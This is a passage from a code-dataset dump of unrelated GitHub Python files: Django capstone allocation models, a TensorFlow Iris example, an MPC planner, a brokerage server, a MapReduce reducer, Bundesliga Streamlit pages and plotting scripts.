'2020'+str(i)\n\t\t\tsLength=rand.choice([1,1.5,2,1,1.5,2,1,1.5,2,3])\n\t\t\tsWidth=rand.choice([1,1.5,2,1,1.5,2,1,1.5,2,3])\n\t\t\tsHeight=rand.choice([1,1.5,2,1,1.5,2,1,1.5,2,3])\n\t\t\tpLength=sLength-0.2\n\t\t\tpWidth=sWidth-0.2\n\t\t\tpHeight=sHeight-0.2\n\t\t\tprojectName='Capstone'+tid\n\t\t\tindustry=rand.choice(['Internet Security','Entrepreneurship','Mobile Application','Logistics','Robotics','Integrated Systems','Architecture','Defense'])\n\t\t\trepEmail=projectName+'@capstone.com'\n\t\t\tnumPP = rand.choice([1,2,3])\n\t\t\tnumBigPed = rand.choice([0,1])\n\t\t\tnumSmallPed = rand.choice([0,1,2])\n\t\t\tpedDesc = rand.choice([\n\t\t\t\t\t\t\t\t\t'TESTTESTTESTTESTTEST',\n\t\t\t\t\t\t\t\t\t'TESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTEST',\n\t\t\t\t\t\t\t\t\t'TESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTEST'\n\t\t\t\t\t\t\t\t\t])\n\t\t\tnumMonitor = rand.choice([0,1])\n\t\t\tnumTV = rand.choice([0,1])\n\t\t\tnumTable = rand.choice([0,1])\n\t\t\tnumChair = rand.choice([0,1,2])\n\t\t\tnumHDMI = numTV+numMonitor\n\t\t\tother = rand.choice([\n\t\t\t\t\t\t\t\t\t'TESTTESTTESTTESTTEST',\n\t\t\t\t\t\t\t\t\t'TESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTEST',\n\t\t\t\t\t\t\t\t\t'TESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTEST'\n\t\t\t\t\t\t\t\t\t])\n\t\t\treqDateTime = dt.now()\n\n\t\t\tif (sLength==3 or sWidth==3 or sHeight==3):\n\t\t\t\tpType='1:1'\n\t\t\telse:\n\t\t\t\tpType=rand.choice(['1:1', 'Scaled Prototype', 'Software Prototype', 'Partial Prototype'])\n\t\t\tif industry == 'Internet Security' or industry == 'Mobile Application':\n\t\t\t\tpType = 'Software Prototype'\n\t\t\t\tsLength=1\n\t\t\t\tsWidth=1\n\t\t\t\tsHeight=1\n\t\t\t\tpLength=0.8\n\t\t\t\tpWidth=0.8\n\t\t\t\tpHeight=0.8\n\t\t\tif numBigPed+numSmallPed==0:\n\t\t\t\tpedDesc=''\n\n\t\t\treq.teamID=tid\n\t\t\treq.projectName=projectName\n\t\t\treq.repEmail=repEmail\n\t\t\treq.industry=industry\n\t\t\treq.pType=pType\n\t\t\treq.pLength=pLength\n\t\t\treq.pWidth=pWidth\n\t\t\treq.pHeight=pHeight\n\t\t\treq.sLength=sLength\n\t\t\treq.sWidth=sWidth\n\t\t\treq.sHeight=sHeight\n\t\t\treq.numPP=numPP\n\t\t\treq.numHDMI=numHDMI\n\t\t\treq.numBigPed=numBigPed\n\t\t\treq.numSmallPed=numSmallPed\n\t\t\treq.pedDesc=pedDesc\n\t\t\treq.numMonitor=numMonitor\n\t\t\treq.numTV=numTV\n\t\t\treq.numTable=numTable\n\t\t\treq.numChair=numChair\n\t\t\treq.other=other\n\t\t\treq.reqDateTime=reqDateTime\n\n\t\t\tprint(projectName)\n\t\t\treq.save()\n\n\nclass Request(models.Model):\n\tteamID = models.CharField(max_length=100)\n\tyearOfGrad = models.IntegerField(default=dt.now().year)\n\tprojectName = models.CharField(max_length=100, null=True)\n\tpType = models.CharField(max_length=100, null=True)\n\tindustry = models.CharField(max_length=100, null=True)\n\trepEmail = models.EmailField(null=True)\n\tpLength = models.FloatField(null=True)\n\tpWidth = models.FloatField(null=True)\n\tpHeight = models.FloatField(null=True)\n\tsLength = models.FloatField(null=True)\n\tsWidth = models.FloatField(null=True)\n\tsHeight = models.FloatField(null=True)\n\tnumPP = models.FloatField(null=True)\n\tnumBigPed = models.FloatField(null=True)\n\tnumSmallPed = models.FloatField(null=True)\n\tpedDesc = models.CharField(max_length=500, null=True)\n\tnumMonitor = models.FloatField(null=True)\n\tnumTV = models.FloatField(null=True)\n\tnumTable = models.FloatField(null=True)\n\tnumChair = models.FloatField(null=True)\n\tnumHDMI = models.FloatField(null=True)\n\tother = models.CharField(max_length=500, null=True)\n\treqDateTime = models.DateTimeField(null=True)\n\n\tdef __str__(self):\n\t\treturn self.teamID\n\n\tdef inputDetails(self, detailsDict):\n\t\tself.projectName = detailsDict['projectName']\n\t\tself.pType = detailsDict['prototypeType']\n\t\tself.industry = detailsDict['industry']\n\t\tself.repEmail = detailsDict['representativeEmail']\n\t\tself.pLength = detailsDict['prototypeLength']\n\t\tself.pWidth = detailsDict['prototypeWidth']\n\t\tself.pHeight = detailsDict['prototypeHeight']\n\t\tself.sLength = detailsDict['showcaseLength']\n\t\tself.sWidth = detailsDict['showcaseWidth']\n\t\tself.sHeight = detailsDict['showcaseHeight']\n\t\tself.numPP = detailsDict['powerpoints']\n\t\tself.numBigPed = detailsDict['bigPedestals']\n\t\tself.numSmallPed = detailsDict['smallPedestals']\n\t\tself.pedDesc = detailsDict['pedestalDescription']\n\t\tself.numMonitor = detailsDict['monitors']\n\t\tself.numTV = detailsDict['TVs']\n\t\tself.numTable = detailsDict['tables']\n\t\tself.numChair = detailsDict['chairs']\n\t\tself.numHDMI = detailsDict['HDMIAdaptors']\n\t\tself.other = detailsDict['others']\n\t\tself.reqDateTime = detailsDict['reqDateTime']\n\t\tself.save()\n\n\tdef injectToDB(self):\n\t\tinject = ReqData(\n\t\t\t\t\t\t\tteamID = self.teamID,\n\t\t\t\t\t\t\tprojectName = self.projectName,\n\t\t\t\t\t\t\tpType = self.pType,\n\t\t\t\t\t\t\tyearOfGrad = self.yearOfGrad,\n\t\t\t\t\t\t\tindustry = self.industry,\n\t\t\t\t\t\t\trepEmail = self.repEmail,\n\t\t\t\t\t\t\tpLength = self.pLength,\n\t\t\t\t\t\t\tpWidth = self.pWidth,\n\t\t\t\t\t\t\tpHeight = self.pHeight,\n\t\t\t\t\t\t\tsLength = self.sLength,\n\t\t\t\t\t\t\tsWidth = self.sWidth,\n\t\t\t\t\t\t\tsHeight = self.sHeight,\n\t\t\t\t\t\t\tnumPP = self.numPP,\n\t\t\t\t\t\t\tnumBigPed = self.numBigPed,\n\t\t\t\t\t\t\tnumSmallPed = self.numSmallPed,\n\t\t\t\t\t\t\tpedDesc = self.pedDesc,\n\t\t\t\t\t\t\tnumMonitor = self.numMonitor,\n\t\t\t\t\t\t\tnumTV = self.numTV,\n\t\t\t\t\t\t\tnumTable = self.numTable,\n\t\t\t\t\t\t\tnumChair = self.numChair,\n\t\t\t\t\t\t\tnumHDMI = self.numHDMI,\n\t\t\t\t\t\t\tother = self.other,\n\t\t\t\t\t\t\treqDateTime = self.reqDateTime,)\n\t\tinject.save()","repo_name":"eugenetdr/50.003-Capstone-Allocation","sub_path":"capstoneAllocation/requirements/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18497821722","text":"import tensorflow as tf\nimport pandas as pd\n\nCSV_COLUMN_NAMES = ['SepalLength', 'SepalWidth',\n 'PetalLength', 'PetalWidth', 'Species']\n\ndef load_data(label_name='Species'):\n #导入数据\n train_path = \"D:\\project\\Python\\Tensorflow\\get_start\\iris_training.csv\"\n test_path=\"D:\\project\\Python\\Tensorflow\\get_start\\iris_test.csv\"\n # train_path now holds the pathname: ~/.keras/datasets/iris_training.csv\n\n # Parse the local CSV file.\n train = pd.read_csv(filepath_or_buffer=train_path,\n names=CSV_COLUMN_NAMES, # list of column names\n header=0 # ignore the first row of the CSV file.\n )\n # train now holds a pandas DataFrame, which is data structure\n # analogous to a table.\n\n # 1. Assign the DataFrame's labels (the right-most column) to train_label.\n # 2. Delete (pop) the labels from the DataFrame.\n # 3. Assign the remainder of the DataFrame to train_features\n train_features, train_label = train, train.pop(label_name)\n\n # Apply the preceding logic to the test set.\n test = pd.read_csv(test_path, names=CSV_COLUMN_NAMES, header=0)\n test_features, test_label = test, test.pop(label_name)\n\n # Return four DataFrames.\n return (train_features, train_label), (test_features, test_label)\n\ndef describe_data(tran_x):\n my_feature_columns=[]\n for key in train_x.keys():\n my_feature_columns.append(tf.feature_column.numeric_column(key=key))\n return my_feature_columns\n\ndef train_input_fn(features,labels,batch_size):\n dataset=tf.data.Dataset.from_tensor_slices((dict(features),labels))\n dataset=dataset.shuffle(buffer_size=1000).repeat(count=None).batch(batch_size)\n return dataset.make_one_shot_iterator().get_next()\n\n\ndef input_fn(features,labels=None,batch_size=None):\n if labels is None:\n inputs=features\n else:\n inputs=(features,labels)\n \n dataset=tf.data.Dataset.from_tensor_slices(inputs)\n\n assert batch_size is not None\n dataset=dataset.batch(batch_size)\n\n return dataset.make_one_shot_iterator().get_next()\n\n\n \n\n\n\n\n\n\n\n(train_x,train_y),(test_x,test_y)=load_data()\n\nmy_feature_columns=describe_data(train_x)\n\nclassifier=tf.estimator.Estimator.DNNClassifier(feature_columns=my_feature_columns,hidden_units=[10,10],n_calsses=3)\n\nclassifier.train(input_fn=train_input_fn(train_x,train_y),steps=args.train_steps)\n","repo_name":"gdjinjiahao/project","sub_path":"Python/Tensorflow/get_start/premade_estimator.py","file_name":"premade_estimator.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9731192425","text":"from functools import partial\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport scipy.stats as stats\n\n\n# -----------------------------------------------------------------------------------\n# Agent\n# -----------------------------------------------------------------------------------\n\nclass MPCAgent:\n \"\"\"Encapsulates sampling-based MPC.\"\"\"\n\n def __init__(self,\n obs_space,\n act_space,\n env_cost_func,\n model,\n act_opt_freq=1,\n horizon=25,\n cem_args={},\n **kwargs):\n # params\n self.obs_space = obs_space\n self.act_space = act_space\n # NOTE: should match the reward/cost func from `env.step(...)`\n self.env_cost_func = env_cost_func\n\n # NOTE: determines how often the action sequence will be optimized\n # NOTE: reoptimizes at every call to `act(...)`\n self.act_opt_freq = act_opt_freq\n self.horizon = horizon\n\n # model\n self.model = model\n self.device = \"cpu\"\n\n # planner\n self.dO = obs_space.shape[0]\n self.dU = act_space.shape[0]\n self.ac_ub = act_space.high\n self.ac_lb = act_space.low\n\n # optimizer (planner)\n self.planner_opt = CEMOptimizer(\n self.horizon * self.dU,\n lower_bound=np.tile(self.ac_lb, [self.horizon]),\n upper_bound=np.tile(self.ac_ub, [self.horizon]),\n **cem_args)\n\n def to(self, device):\n \"\"\"Puts agent to device.\"\"\"\n self.model.to(device)\n self.device = device\n\n def train(self):\n \"\"\"Sets training mode.\"\"\"\n self.model.train()\n\n def eval(self):\n \"\"\"Sets evaluation mode.\"\"\"\n self.model.eval()\n\n def state_dict(self):\n \"\"\"Snapshots agent state.\"\"\"\n return {\n \"model\": self.model.state_dict(),\n }\n\n def load_state_dict(self, state_dict):\n \"\"\"Restores agent state.\"\"\"\n self.model.load_state_dict(state_dict[\"model\"])\n\n def reset(self):\n \"\"\"Resets this controller (at trajecotry start).\"\"\"\n self.ac_buf = np.array([]).reshape(0, self.dU)\n self.prev_sol = np.tile((self.ac_lb + self.ac_ub) / 2, [self.horizon])\n self.init_var = np.tile(\n np.square(self.ac_ub - self.ac_lb) / 16, [self.horizon])\n self.planner_opt.reset()\n\n def act(self, obs, t, info):\n \"\"\"Selects action based on learned dynamics and mpc planning.\n\n Constructs the cost function for the current step, which is \n different between steps due to different current obs, also \n passes other necessary arguments `info` for `env_cost_func`.\n \"\"\"\n cost_func = partial(self.cost_func, obs=obs, info=info)\n action = self._solve_mpc(cost_func)\n return action\n\n def _solve_mpc(self, cost_func):\n \"\"\"Solves the MPC optimization problem for action sequence.\"\"\"\n if self.ac_buf.shape[0] > 0:\n action, self.ac_buf = self.ac_buf[0], self.ac_buf[1:]\n return action\n\n soln = self.planner_opt.obtain_solution(self.prev_sol, self.init_var,\n cost_func)\n # for next call of `act(...)`\n # previous soln is everything after currently taken action\n self.prev_sol = np.concatenate([\n np.copy(soln)[self.act_opt_freq * self.dU:],\n np.zeros(self.act_opt_freq * self.dU)\n ])\n # current soln, can take 1st step as action\n # saves `act_opt_freq` steps to reduce solving mpc every step\n self.ac_buf = soln[:self.act_opt_freq * self.dU].reshape(-1, self.dU)\n\n return self._solve_mpc(cost_func)\n\n @torch.no_grad()\n def cost_func(self, ac_seqs, obs=None, info=None):\n \"\"\"MPC rollout cost.\n \n Args:\n ac_seqs (np.array): decision vars, (pop_size, horizon * act_dim) actions.\n obs (np.array): conditional vars, (O,) current observation.\n info (dict): conditional vars, current info from env.\n\n Returns:\n np.array: (pop_size,) costs\n \"\"\"\n pop_size = ac_seqs.shape[0]\n # For parallel compute, (H, Pop_size, A)\n ac_seqs = torch.from_numpy(ac_seqs).float()\n ac_seqs = ac_seqs.view(-1, self.horizon, self.dU).transpose(0, 1)\n\n # current observation, (Pop_size, O)\n cur_obs = torch.from_numpy(obs).float()\n cur_obs = cur_obs.unsqueeze(0).repeat((pop_size, 1))\n\n costs = torch.zeros(pop_size)\n for t in range(self.horizon):\n cur_acs = ac_seqs[t]\n # maybe model forward in GPU but mpc planning in CPU\n next_obs = self.model(cur_obs.to(self.device),\n cur_acs.to(self.device))\n next_obs = next_obs.cpu()\n cur_obs = next_obs\n # shape (*,)\n cost = self.env_cost_func(next_obs, cur_acs, info)\n costs += cost\n\n # replace nan with high cost\n costs[costs != costs] = 1e6\n # (Pop_size,)\n return costs.detach().cpu().numpy()\n\n\n# -----------------------------------------------------------------------------------\n# Sampling-based Optimizer\n# -----------------------------------------------------------------------------------\n\nclass CEMOptimizer:\n \"\"\"Cross-entropy method for (gradient-free) optimization.\"\"\"\n\n def __init__(self, sol_dim, lower_bound=None, upper_bound=None, max_iters=5, pop_size=400, num_elites=40, epsilon=0.001, alpha=0.25):\n \"\"\"Creates the CEM optimizer.\n\n Args:\n sol_dim (int): The dimensionality of the problem space\n lower_bound (np.array): An array of lower bounds\n upper_bound (np.array): An array of upper bounds\n max_iters (int): The maximum number of iterations to perform during optimization\n pop_size (int): The number of candidate solutions to be sampled at every iteration\n num_elites (int): The number of top solutions that will be used to obtain the distribution\n at the next iteration.\n epsilon (float): A minimum variance. If the maximum variance drops below epsilon, optimization is\n stopped.\n alpha (float): Controls how much of the previous mean and variance is used for the next iteration.\n next_mean = alpha * old_mean + (1 - alpha) * elite_mean, and similarly for variance.\n \"\"\"\n self.sol_dim = sol_dim\n self.max_iters = max_iters\n self.pop_size = pop_size\n self.num_elites = num_elites\n\n self.lb = lower_bound\n self.ub = upper_bound\n self.epsilon = epsilon\n self.alpha = alpha\n\n if num_elites > pop_size:\n raise ValueError(\"Number of elites must be at most the population size.\")\n\n def reset(self):\n pass\n\n def obtain_solution(self, init_mean, init_var, cost_func):\n \"\"\"Optimizes the cost function using the provided initial candidate distribution\n\n Args:\n init_mean (np.ndarray): The mean of the initial candidate distribution.\n init_var (np.ndarray): The variance of the initial candidate distribution.\n cost_func (callable): cost function with only the unsolved variable as arguments.\n \"\"\"\n mean, var, t = init_mean, init_var, 0\n X = stats.truncnorm(-2, 2, loc=np.zeros_like(mean), scale=np.ones_like(var))\n\n while (t < self.max_iters) and np.max(var) > self.epsilon:\n lb_dist, ub_dist = mean - self.lb, self.ub - mean\n constrained_var = np.minimum(np.minimum(np.square(lb_dist / 2), np.square(ub_dist / 2)), var)\n\n samples = X.rvs(size=[self.pop_size, self.sol_dim]) * np.sqrt(constrained_var) + mean\n samples = samples.astype(np.float32)\n costs = cost_func(samples)\n\n elites = samples[np.argsort(costs)][:self.num_elites]\n\n new_mean = np.mean(elites, axis=0)\n new_var = np.var(elites, axis=0)\n\n mean = self.alpha * mean + (1 - self.alpha) * new_mean\n var = self.alpha * var + (1 - self.alpha) * new_var\n\n t += 1\n return mean\n \n \n","repo_name":"StafaH/safe_imitation","sub_path":"safe_il/agents/mpc/mpc_utils.py","file_name":"mpc_utils.py","file_ext":"py","file_size_in_byte":8335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26855522460","text":"import logging\n\nclass BrokerageServer():\n\n def __init__(self, consumer, producer, order_repository, logger=None):\n self._consumer = consumer\n self._producer = producer\n self._order_repository = order_repository\n self._logger = logger or logging.getLogger(__name__)\n self._producer.req_cancel_order(self._consumer.cancel_order)\n self._producer.req_place_order(self._place_order_wrapper)\n self._producer.req_modify_order(self._consumer.modify_order)\n self._producer.req_get_position(self._consumer.get_position)\n self._producer.req_get_order_status(self._consumer.get_order_status)\n self._producer.req_get_orders(self._consumer.get_orders)\n #self._consumer.on_position_update(self._producer.publish_position_update)\n #self._consumer.on_order_update(self._producer.publish_order_update)\n #self._consumer.on_new_order(self._producer.publish_new_order)\n\n def connect(self):\n self._consumer.connect()\n self._producer.connect()\n\n def run(self):\n self._consumer.run()\n self._producer.run()\n\n async def _place_order_wrapper(self, order_request):\n self._logger.info(\"[ORQ] Pushing order request\")\n _order_request = order_request.copy()\n try:\n self._order_repository.add_order_request(_order_request)\n except Exception as e:\n self._logger.error('Failed to add order request to repository: {}'.format(e))\n order_id = await self._consumer.place_order(order_request)\n if isinstance(order_id,int):\n _order_request['orderId'] = order_id\n try:\n self._order_repository.add_order_execution(_order_request)\n except Exception as e:\n self._logger.error('Failed to add order execution to repository: {}'.format(e))\n\n","repo_name":"ardagk/trisigma","sub_path":"trisigma/app/brokerage/interactor/brokerage_server.py","file_name":"brokerage_server.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1762043142","text":"#!/usr/bin/env python3\n\nimport sys\nfrom collections import defaultdict\n\n\nmins = defaultdict(lambda: 99.9)\nmaxs = defaultdict(lambda: -99.9)\nlast_k = None\nk = None\n\nfor line in sys.stdin:\n if not line.strip():\n continue\n k, v, w = line.strip().split('\\t')\n v = float(v)\n w = float(w)\n\n mins[k] = min(mins[k], v)\n maxs[k] = max(maxs[k], w)\n\n if last_k != k:\n if last_k:\n print('%s\\t%s\\t%s' % (last_k, mins[last_k], maxs[last_k]))\n last_k = k\n\nif last_k == k:\n print('%s\\t%s\\t%s' % (k, mins[last_k], maxs[last_k]))\n","repo_name":"aFlyWeight/ParallelProgrammingHomework","sub_path":"最后大作业/project3/codeanddata/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12127958214","text":"import numpy as np\nfrom scipy.optimize import minimize\nfrom ns_func import Z\n\n# Defining optimizators\ndef iter_minimizer(Loss, beta_init, loss_args, bounds, max_deal_span, **kwargs):\n i = 0.1\n def callback_print(xk):\n loss = Loss(xk, df=loss_args[0], coupons_cf=loss_args[1], \n streak_data=loss_args[2], weight_scheme=loss_args[4])\n print(xk, loss)\n #optimization goes in loop until spot rate function will not be bigger\n #than 0 at each point;\n #Z constructs from 0.001 year to 30 year (no bonds with tenor > 30 year)\n while (Z(np.linspace(0.001, 30, 1000), beta_init)).min() < 0 or i == 0.1:\n res = minimize(fun=Loss, x0=beta_init, args=loss_args, bounds=bounds, \n callback=callback_print, **kwargs) \n beta_init = res.x\n #bounds of teta increases at every iteration by i which itself increases\n #also, as we want to exit negative zone as fast as we can\n bounds = ((0, 1), (None, None), (None, None), \n (beta_init[-1] + i, 0.05 * max_deal_span))\n i += 0.1\n return res\n\n","repo_name":"DFSResearch/FinancialStability_Lab","sub_path":"NelsonSiegel/optimizator/simultaneous_min.py","file_name":"simultaneous_min.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"11249530645","text":"from typing import List\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n \n if not nums: \n return 0\n \n index = 0\n compare = nums[0]\n\n for num in nums: \n if num > compare: \n index += 1\n nums[index] = num\n compare = nums[index]\n \n return index + 1\n\ndef main():\n sol = Solution()\n\n list1 = [1,1,2]\n list2 = [0,0,1,1,1,2,2,3,3,4]\n list3 = [1]\n list4 = []\n list5 = [0,0,0,0,0,0,0,0,2]\n\n print(sol.removeDuplicates(list2))\n print(list2)\n\nif __name__ == \"__main__\":\n main()","repo_name":"kgremban/leetcode","sub_path":"0026-remove-duplicates-fror-sorted-array.py","file_name":"0026-remove-duplicates-fror-sorted-array.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32160006165","text":"import streamlit as st\nfrom streamlit_option_menu import option_menu\nfrom python_scripts.data_script import BunesligaInfo, BundesligaGameData\nfrom python_scripts.game_stats_app_scripts.game_stats_utils import GameStatsConfiguration, GameStatsProcessing\nfrom python_scripts.game_stats_app_scripts.game_results_script import game_results_page\nfrom python_scripts.game_stats_app_scripts.standings_stats_script import standings_page\nfrom python_scripts.game_stats_app_scripts.game_stats_script import game_stats_page\nfrom python_scripts.game_stats_app_scripts.team_stats_script import team_page\nfrom python_scripts.game_stats_app_scripts.player_stats_script import player_page\nfrom python_scripts.game_stats_app_scripts.gk_stats_script import gk_page\n\ndef game_stats_analysis(bundesliga_info:BunesligaInfo,\n bundesliga_game_data:BundesligaGameData,\n game_stats_config:GameStatsConfiguration,\n game_stats_processing:GameStatsProcessing,\n team:str, \n season_teams:list,\n season:str, \n last_5_seasons:list) -> st:\n\n\n # ##### Load Season Data\n table_info = game_stats_config.get_tab_info()\n season_team_data = bundesliga_game_data.retrieve_season_data(table=table_info.team_stats_tab, \n season=season)\n season_gk_data = bundesliga_game_data.retrieve_season_data(table=table_info.gk_stats_tab,\n season=season)\n\n season_data = game_stats_processing.filter_season_data(\n data=game_stats_processing.process_goals_opponent(\n data=game_stats_processing.process_team_data(data=season_team_data, \n data_gk=season_gk_data)))\n \n # ##### Page Description\n st.markdown(\n 'Analyse different types of Bundesliga Game Stats at both '\n 'Team and Player level',\n unsafe_allow_html=True)\n\n # ##### Game Stats Analysis Types\n statistics_type = [\"Match Day Results\",\n \"Season Standings\",\n \"Game Statistics\",\n \"Team Statistics\",\n \"Player Statistics\",\n \"Gk Statistics\"]\n\n with st.sidebar:\n st.subheader(\"Statistics\")\n statistics_track = option_menu(menu_title=None,\n options=statistics_type,\n icons=[\"calendar3\", \"table\", \"clipboard-data\",\n \"reception-4\", \"person-lines-fill\", \"shield-shaded\"],\n styles={\"nav-link\": {\"--hover-color\": \"#e5e5e6\"}})\n\n ##### Match Day Results\n if statistics_track == 'Match Day Results':\n game_results_page(game_stats_config=game_stats_config,\n data=season_data,\n page_season=season, \n favourite_team=team)\n\n # ##### Season Table\n elif statistics_track == 'Season Standings':\n standings_page(game_stats_config=game_stats_config,\n game_stats_processing=game_stats_processing,\n data=season_data, \n page_season=season,\n favourite_team=team)\n \n # ##### Game Statistics\n elif statistics_track == 'Game Statistics':\n game_stats_page(data=season_data,\n page_season=season,\n favourite_team=team)\n\n ##### Team Statistics\n elif statistics_track == 'Team Statistics':\n # ##### Load Last 5 Seasons Data\n all_seasons_team_data = bundesliga_game_data.retrieve_all_seasons_data(table=table_info.team_stats_tab,\n team=team,\n seasons=last_5_seasons,\n team_analysis=True)\n all_seasons_gk_data = bundesliga_game_data.retrieve_all_seasons_data(table=table_info.gk_stats_tab,\n team=team,\n seasons=last_5_seasons)\n \n # ##### Process Last 5 Seasons Data\n all_seasons_data = game_stats_processing.filter_season_data(\n data=game_stats_processing.process_team_data(data=all_seasons_team_data,\n data_gk=all_seasons_gk_data))\n \n # ##### Retrieve Season Games\n season_games_schedule=bundesliga_info.retrieve_season_games(table=table_info.games_tab,\n season=season)\n\n # ##### Team Page\n team_page(data=season_data,\n data_all=all_seasons_data,\n games_schedule=season_games_schedule,\n page_season=season,\n favourite_team=team,\n season_teams=season_teams)\n \n # # ##### Player Statistics\n elif statistics_track == 'Player Statistics':\n season_player_data = game_stats_processing.filter_season_data(data=bundesliga_game_data.retrieve_season_data(\n table=table_info.player_stats_tab, season=season))\n \n player_page(data=season_player_data,\n favourite_team=team,\n page_season=season,\n season_teams=season_teams,\n last_5_seasons=last_5_seasons)\n \n # ##### Goalkeeper Statistics\n elif statistics_track == 'Gk Statistics':\n season_gk_data = game_stats_processing.filter_season_data(data=season_gk_data)\n\n gk_page(data=season_gk_data,\n favourite_team=team,\n page_season=season,\n season_teams=season_teams,\n last_5_seasons=last_5_seasons)\n \n st.sidebar.markdown(\"\")\n","repo_name":"BVBtm86/bundesliga_app","sub_path":"python_scripts/game_stats_app.py","file_name":"game_stats_app.py","file_ext":"py","file_size_in_byte":6280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"19844949372","text":"import csv\nimport matplotlib.pyplot as plt\n\ndef read_data():\n with open(\"Visual/subplots2/temps.csv\") as csvfile:\n # Use the csv.reader function to get data from the csv file, \n # then use the next function to take the headers from the\n # file\n csv_reader = csv.reader(csvfile)\n headers = next(csv_reader)\n\n # Using an empty dict, use a loop to append the headers as\n # keys, each key will store a list\n data = {}\n for header in headers:\n data[header]=[]\n\n # Then, for every other line in the file, repeated by the number\n # of headers, we append the data to their appropriate header\n for line in csv_reader:\n for count in range(len(headers)):\n data[headers[count]].append(line[count] + \"°\")\n\n # Return the dict\n return data\n\n# Run function which takes no parameters\ndef run():\n # Firstly, call the read_data function and store its contents\n # in a variable, I use a second variable to get the items in\n # the dict\n data = read_data()\n formatted_data = data.items()\n\n # Next, using a loop, we find out how many subplots will be needed\n subplots_needed = 0\n for count in range(len(formatted_data)):\n subplots_needed += 1\n \n # Using the variable above, we can dynamically add more subplots\n # if additional data is added to the temps.csv file\n fig, axes = plt.subplots(subplots_needed, 1, sharex=\"all\", sharey=\"all\")\n fig.suptitle(\"Dynamic Temperature Data\")\n\n # We can do the same for plotting data, a count variable is used\n # to decide which subplot should be plotted to\n count = 0\n for line in formatted_data:\n axes[count].plot(range(1, 8), line[1], \"bo-\")\n count += 1\n\n # Finally, I set an x label, make the figure use a tight layout\n # and show the plot\n axes[-1].set_xlabel(\"Day\")\n\n fig.tight_layout()\n plt.show()\n\n# Run the program\nrun()","repo_name":"WT000/COM411","sub_path":"Visual/subplots2/csv_data.py","file_name":"csv_data.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29675414485","text":"import os\nimport matplotlib.pyplot as plt\n\nfrom misomip1analysis.models import load_datasets\nfrom misomip1analysis.util import string_to_list\n\n\ndef plot_metric_timeseries(config):\n \"\"\"\n Plot a time series of a given metric for all models.\n\n Parameters\n ----------\n config : ConfigParser\n config options\n \"\"\"\n\n experiment = config['experiment']['name']\n\n metrics = config['metrics']\n metricNames = string_to_list(metrics['names'])\n if metricNames[0] == '':\n # nothing to plot\n return\n\n plotFolder = metrics['folder']\n\n try:\n os.makedirs(plotFolder)\n except OSError:\n pass\n\n colors = string_to_list(metrics['colors'])\n dpi = metrics.getint('dpi')\n lineWidth = metrics.getint('lineWidth')\n figsize = string_to_list(metrics['figsize'])\n figsize = [float(dim) for dim in figsize]\n\n datasets, maxTime = load_datasets(config, variableList=metricNames)\n modelNames = list(datasets.keys())\n\n for metricName in metricNames:\n metricConfig = config[metricName]\n semilog = metricConfig.getboolean('semilog')\n scale = metricConfig.getfloat('scale')\n title = metricConfig['title']\n\n plt.figure(figsize=figsize)\n for modelIndex, modelName in enumerate(modelNames):\n ds = datasets[modelName]\n if metricName not in ds.data_vars:\n continue\n\n years = ds.time.values/config['constants'].getfloat('sPerYr')\n field = scale*ds[metricName].values\n if semilog:\n plt.semilogy(years, field, label=modelName,\n color=colors[modelIndex], linewidth=lineWidth)\n else:\n plt.plot(years, field, label=modelName,\n color=colors[modelIndex], linewidth=lineWidth)\n\n plt.ylabel(title)\n plt.xlabel('time (a)')\n plt.legend(loc='best')\n plt.tight_layout()\n plt.draw()\n plt.savefig('{}/{}_{}.png'.format(plotFolder, experiment, metricName),\n dpi=dpi)\n plt.close()\n","repo_name":"xylar/misomip1analysis","sub_path":"misomip1analysis/plot/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"21246046769","text":"import numpy as np\n\nfrom math import cos, sin, pi\nimport os\nimport matplotlib.pyplot as plt\nfrom PIL import Image, ImageDraw\n\"\"\"\n input [A, B, C, X, Y]\n output [theta, omega, phi]/180\n X <- A cos(theta) + B 